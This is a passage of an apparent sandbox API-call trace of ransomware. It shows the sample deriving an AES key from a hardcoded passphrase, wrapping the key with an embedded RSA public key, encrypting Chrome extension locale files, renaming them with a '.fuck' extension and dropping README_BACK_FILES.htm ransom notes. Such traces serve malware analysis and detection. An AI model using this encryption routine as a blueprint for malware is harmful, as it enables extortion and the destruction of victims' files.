dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.899] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0256.899] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.900] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.900] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14fd8) returned 1 [0256.900] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14fd8, dwCertEncodingType=0x1, pInfo=0x2e2b690*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b6c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b6c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19468) returned 1 [0256.900] CryptEncrypt (in: hKey=0x2e19468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.900] CryptEncrypt (in: hKey=0x2e19468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14db8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14db8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.900] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e14db8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14db8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.901] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x12a, lpOverlapped=0x0) returned 1 [0256.928] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x12a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0256.928] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0256.928] CloseHandle (hObject=0x5d5c) returned 1 [0256.928] CloseHandle (hObject=0x5d60) returned 1 [0256.929] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0256.932] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0256.932] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg")) returned 1 [0256.933] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.fuck")) returned 1 [0256.935] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.935] CryptDestroyKey (hKey=0x2e19828) returned 1 [0256.935] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.935] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.935] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.935] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0256.935] AreFileApisANSI () returned 1 [0256.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.936] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.936] GetFileType (hFile=0x5d50) returned 0x1 [0256.937] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.938] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.938] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.938] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.938] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.938] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.938] GetLastError () returned 0x0 [0256.938] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json")) returned 0x20 [0256.938] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0256.939] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.939] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.940] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.941] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.943] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.943] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.943] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.943] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0256.943] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.943] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.943] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15528) returned 1 [0256.943] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15528, dwCertEncodingType=0x1, pInfo=0x2e2baa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bad0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bad8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e193a8) returned 1 [0256.943] CryptEncrypt (in: hKey=0x2e193a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.943] CryptEncrypt (in: hKey=0x2e193a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15060*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15060*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.944] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15060*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15060*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.944] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb2, lpOverlapped=0x0) returned 1 [0256.945] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0256.946] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0256.946] CloseHandle (hObject=0x5d60) returned 1 [0256.946] CloseHandle (hObject=0x5d5c) returned 1 [0256.946] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0256.948] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0256.949] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0256.950] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0256.951] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.951] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0256.951] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.951] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.952] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.952] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0256.952] AreFileApisANSI () returned 1 [0256.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0256.952] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.952] GetFileType (hFile=0x5d50) returned 0x1 [0256.953] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.953] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.954] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.954] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.954] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.954] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.954] GetLastError () returned 0x0 [0256.954] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json")) returned 0x20 [0256.955] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0256.955] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.956] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.956] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.956] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.958] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.958] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.958] CryptHashData (hHash=0x2e18128, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.958] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0256.959] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.959] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.959] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15170) returned 1 [0256.959] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15170, dwCertEncodingType=0x1, pInfo=0x2e2bf80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bfb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bfb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19fa8) returned 1 [0256.959] CryptEncrypt (in: hKey=0x2e19fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.959] CryptEncrypt (in: hKey=0x2e19fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e145c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e145c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e145c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e145c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x109, lpOverlapped=0x0) returned 1 [0256.962] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x109, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0256.962] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0256.962] CloseHandle (hObject=0x5d5c) returned 1 [0256.962] CloseHandle (hObject=0x5d60) returned 1 [0256.962] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 